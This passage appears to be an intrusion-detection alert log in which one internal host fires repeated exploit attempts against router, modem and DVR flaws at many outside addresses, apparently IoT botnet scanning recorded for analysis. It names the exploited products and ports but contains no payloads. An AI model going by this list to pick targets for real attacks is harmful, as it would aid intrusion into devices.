Timestamp:	03/18/24-09:59:14.044383
SID:	2023548
Source Port:	46762
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.199.108.163

Timestamp:	03/18/24-10:00:14.807201
SID:	2030092
Source Port:	39208
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.81.222.9

Timestamp:	03/18/24-09:58:10.721395
SID:	2023548
Source Port:	58602
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.157.114.244

Timestamp:	03/18/24-09:58:50.186467
SID:	2023548
Source Port:	44284
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.38.156.205

Timestamp:	03/18/24-09:58:59.224249
SID:	2025883
Source Port:	49154
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 202.120.33.37

Timestamp:	03/18/24-09:59:08.993735
SID:	2025883
Source Port:	52510
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 200.104.229.105

Timestamp:	03/18/24-09:58:21.190550
SID:	2023548
Source Port:	50292
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 109.195.20.222

Timestamp:	03/18/24-10:00:15.108053
SID:	2025576
Source Port:	54902
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 149.56.42.88

Timestamp:	03/18/24-09:58:19.201279
SID:	2025883
Source Port:	37050
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 103.207.8.114

Timestamp:	03/18/24-09:59:29.095288
SID:	2025576
Source Port:	34988
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 182.78.200.84

Timestamp:	03/18/24-09:58:47.030155
SID:	2030092
Source Port:	58258
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.77.135.134

Timestamp:	03/18/24-09:58:48.532679
SID:	2835222
Source Port:	48198
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.212.62.74

Timestamp:	03/18/24-10:00:03.073992
SID:	2023548
Source Port:	48472
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.33.97.108

Timestamp:	03/18/24-09:59:30.575202
SID:	2023548
Source Port:	54362
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 68.105.122.47

Timestamp:	03/18/24-09:59:57.044051
SID:	2023548
Source Port:	41402
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.186.240.82

Timestamp:	03/18/24-09:58:28.455464
SID:	2023548
Source Port:	46382
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 70.123.135.226

Timestamp:	03/18/24-09:58:34.355574
SID:	2023548
Source Port:	53502
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 146.190.138.31

Timestamp:	03/18/24-09:58:33.473987
SID:	2025883
Source Port:	41280
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.122.238

Timestamp:	03/18/24-09:58:50.483218
SID:	2018132
Source Port:	48512
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 67.1.131.119

Timestamp:	03/18/24-09:58:24.094054
SID:	2023548
Source Port:	44704
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 94.45.87.85

Timestamp:	03/18/24-09:58:11.940531
SID:	2023548
Source Port:	47782
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 59.2.75.81

Timestamp:	03/18/24-09:58:35.212858
SID:	2023548
Source Port:	56614
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.103.173.51

Timestamp:	03/18/24-09:58:52.695088
SID:	2030092
Source Port:	48530
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 152.250.125.113

Timestamp:	03/18/24-09:59:06.697437
SID:	2023548
Source Port:	51278
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 5.35.84.86

Timestamp:	03/18/24-09:59:34.673426
SID:	2025576
Source Port:	42024
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 193.105.29.92

Timestamp:	03/18/24-09:59:25.910371
SID:	2030092
Source Port:	58542
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 37.56.101.124

Timestamp:	03/18/24-09:59:37.425667
SID:	2023548
Source Port:	42532
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 3.229.102.143

Timestamp:	03/18/24-09:59:06.815010
SID:	2025576
Source Port:	44522
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 154.89.230.18

Timestamp:	03/18/24-09:59:48.759033
SID:	2030092
Source Port:	49280
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.107.234.170

Timestamp:	03/18/24-09:57:01.515697
SID:	2023548
Source Port:	55476
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 71.45.48.26

Timestamp:	03/18/24-09:59:05.573844
SID:	2030092
Source Port:	36694
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 133.32.60.216

Timestamp:	03/18/24-09:58:36.079767
SID:	2025576
Source Port:	58544
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 182.93.114.140

Timestamp:	03/18/24-09:59:10.030799
SID:	2030092
Source Port:	60420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.105.76.123

Timestamp:	03/18/24-09:57:04.406396
SID:	2018132
Source Port:	32788
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 13.235.184.48

Timestamp:	03/18/24-10:00:14.886430
SID:	2025883
Source Port:	46106
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 148.251.199.54

Timestamp:	03/18/24-09:59:48.703151
SID:	2025576
Source Port:	54282
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.38.50

Timestamp:	03/18/24-09:58:42.166895
SID:	2018132
Source Port:	51614
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.252.167.53

Timestamp:	03/18/24-09:58:12.275003
SID:	2023548
Source Port:	43964
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 121.41.103.145

Timestamp:	03/18/24-09:58:26.553402
SID:	2025576
Source Port:	39382
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 45.235.186.141

Timestamp:	03/18/24-09:58:15.562980
SID:	2030092
Source Port:	43748
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 45.59.160.240

Timestamp:	03/18/24-09:58:30.794788
SID:	2025883
Source Port:	50648
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 109.33.25.151

Timestamp:	03/18/24-09:58:29.874325
SID:	2030092
Source Port:	34714
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.238.148.30

Timestamp:	03/18/24-09:58:17.821362
SID:	2023548
Source Port:	60288
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 138.0.73.169

Timestamp:	03/18/24-09:59:05.828123
SID:	2030092
Source Port:	48678
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 98.11.96.145

Timestamp:	03/18/24-09:58:35.185354
SID:	2023548
Source Port:	33272
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.19.244

Timestamp:	03/18/24-09:59:56.818352
SID:	2018132
Source Port:	46698
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 173.194.166.70

Timestamp:	03/18/24-09:59:48.894367
SID:	2030092
Source Port:	42902
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.11.193.212

Timestamp:	03/18/24-09:57:08.577451
SID:	2023548
Source Port:	46772
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 162.159.160.82

Timestamp:	03/18/24-09:59:12.795104
SID:	2025576
Source Port:	43934
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 190.2.58.152

Timestamp:	03/18/24-09:59:05.978076
SID:	2030092
Source Port:	59280
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 184.167.249.7

Timestamp:	03/18/24-09:59:56.965080
SID:	2030092
Source Port:	45710
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.253.49.92

Timestamp:	03/18/24-09:58:16.056420
SID:	2023548
Source Port:	37686
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 67.6.90.92

Timestamp:	03/18/24-09:58:16.058180
SID:	2023548
Source Port:	41060
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 128.199.35.250

Timestamp:	03/18/24-09:59:39.936485
SID:	2025576
Source Port:	48626
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 71.76.2.147

Timestamp:	03/18/24-10:00:15.600922
SID:	2023548
Source Port:	44216
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 172.125.77.119

Timestamp:	03/18/24-10:00:14.782732
SID:	2030092
Source Port:	55094
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 189.41.19.125

Timestamp:	03/18/24-09:59:24.387476
SID:	2023548
Source Port:	33930
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.248.51.114

Timestamp:	03/18/24-09:59:35.732152
SID:	2023548
Source Port:	55798
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 210.102.136.0

Timestamp:	03/18/24-09:59:42.410311
SID:	2025576
Source Port:	42534
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.250.89.242

Timestamp:	03/18/24-09:58:33.481375
SID:	2018132
Source Port:	45378
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 192.99.35.77

Timestamp:	03/18/24-09:59:13.733684
SID:	2025883
Source Port:	55994
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 184.98.255.213

Timestamp:	03/18/24-09:59:39.985592
SID:	2023548
Source Port:	51826
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.253.49.92

Timestamp:	03/18/24-09:58:16.181627
SID:	2023548
Source Port:	37780
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 104.231.47.139

Timestamp:	03/18/24-10:00:22.259309
SID:	2023548
Source Port:	53318
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 117.20.52.25

Timestamp:	03/18/24-09:58:57.385299
SID:	2030092
Source Port:	59110
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.175.15.109

Timestamp:	03/18/24-09:58:14.555012
SID:	2018132
Source Port:	48492
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.252.228.126

Timestamp:	03/18/24-09:58:35.174504
SID:	2023548
Source Port:	39204
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 142.198.96.161

Timestamp:	03/18/24-09:59:19.235033
SID:	2030092
Source Port:	36538
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 52.200.57.84

Timestamp:	03/18/24-09:58:36.191116
SID:	2025576
Source Port:	35996
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 94.49.205.172

Timestamp:	03/18/24-10:00:02.112043
SID:	2023548
Source Port:	58422
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.103.93.208

Timestamp:	03/18/24-09:58:41.235234
SID:	2030092
Source Port:	44068
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 34.198.169.148

Timestamp:	03/18/24-09:58:15.389618
SID:	2030092
Source Port:	43596
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.213.164.131

Timestamp:	03/18/24-09:59:51.701625
SID:	2030092
Source Port:	53534
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 104.33.139.210

Timestamp:	03/18/24-10:00:11.001772
SID:	2023548
Source Port:	38124
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.197.46.105

Timestamp:	03/18/24-09:59:21.949584
SID:	2023548
Source Port:	56514
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.241.27.215

Timestamp:	03/18/24-09:59:39.946480
SID:	2023548
Source Port:	54566
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 46.105.62.153

Timestamp:	03/18/24-09:59:42.291394
SID:	2025576
Source Port:	54312
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 94.122.237.94

Timestamp:	03/18/24-09:59:19.226913
SID:	2030092
Source Port:	39144
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.248.44.174

Timestamp:	03/18/24-10:00:00.565491
SID:	2023548
Source Port:	32938
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 103.199.108.163

Timestamp:	03/18/24-10:00:14.807201
SID:	2025883
Source Port:	39208
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.225.88.98

Timestamp:	03/18/24-09:58:18.290531
SID:	2023548
Source Port:	45316
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 77.253.223.206

Timestamp:	03/18/24-09:58:28.730366
SID:	2025576
Source Port:	34158
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 156.235.103.211

Timestamp:	03/18/24-09:59:49.453378
SID:	2023548
Source Port:	58664
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.33.97.108

Timestamp:	03/18/24-09:59:31.715386
SID:	2023548
Source Port:	54420
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 45.200.58.142

Timestamp:	03/18/24-09:58:26.535762
SID:	2025576
Source Port:	41400
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 47.97.205.21

Timestamp:	03/18/24-10:00:03.096499
SID:	2025576
Source Port:	47894
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.17.102.138

Timestamp:	03/18/24-09:57:05.804300
SID:	2025883
Source Port:	36400
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.143.190.135

Timestamp:	03/18/24-09:58:24.330823
SID:	2030092
Source Port:	38794
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 34.225.83.253

Timestamp:	03/18/24-09:57:05.716958
SID:	2025883
Source Port:	37622
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 193.123.123.131

Timestamp:	03/18/24-09:58:57.120042
SID:	2030092
Source Port:	44232
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 179.53.210.42

Timestamp:	03/18/24-09:59:19.284387
SID:	2030092
Source Port:	52656
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.7.225.239

Timestamp:	03/18/24-09:59:33.080249
SID:	2023548
Source Port:	33590
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.122.126.218

Timestamp:	03/18/24-09:58:36.197369
SID:	2023548
Source Port:	37832
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.75.227.64

Timestamp:	03/18/24-09:59:14.065839
SID:	2025576
Source Port:	34902
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.50.17

Timestamp:	03/18/24-09:59:19.268714
SID:	2018132
Source Port:	43014
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.211.5.73

Timestamp:	03/18/24-10:00:00.733885
SID:	2023548
Source Port:	40448
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.225.62.214

Timestamp:	03/18/24-09:58:43.949023
SID:	2023548
Source Port:	52678
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.146.140

Timestamp:	03/18/24-09:58:21.524213
SID:	2018132
Source Port:	44786
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.223.127.222

Timestamp:	03/18/24-09:57:03.365817
SID:	2023548
Source Port:	45710
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 199.232.224.182

Timestamp:	03/18/24-09:58:44.610960
SID:	2025883
Source Port:	56868
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 154.36.141.6

Timestamp:	03/18/24-09:59:41.586277
SID:	2025883
Source Port:	40976
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.197.46.105

Timestamp:	03/18/24-09:59:23.120567
SID:	2023548
Source Port:	56644
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 76.223.3.151

Timestamp:	03/18/24-09:58:15.735414
SID:	2025576
Source Port:	50202
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 185.216.190.68

Timestamp:	03/18/24-09:58:44.258088
SID:	2030092
Source Port:	43684
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 68.3.18.73

Timestamp:	03/18/24-09:59:23.656120
SID:	2023548
Source Port:	56456
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.238.90.225

Timestamp:	03/18/24-10:00:16.291762
SID:	2023548
Source Port:	44214
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.178.183.192

Timestamp:	03/18/24-09:58:26.913565
SID:	2025883
Source Port:	47222
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 93.110.74.175

Timestamp:	03/18/24-09:58:41.657110
SID:	2030092
Source Port:	49996
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.234.116.58

Timestamp:	03/18/24-09:59:31.392508
SID:	2023548
Source Port:	60916
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.247.31.44

Timestamp:	03/18/24-09:59:09.614497
SID:	2829579
Source Port:	53746
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.235.103.31

Timestamp:	03/18/24-09:58:27.163784
SID:	2829579
Source Port:	50942
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.207.236.202

Timestamp:	03/18/24-09:58:19.021722
SID:	2030092
Source Port:	48956
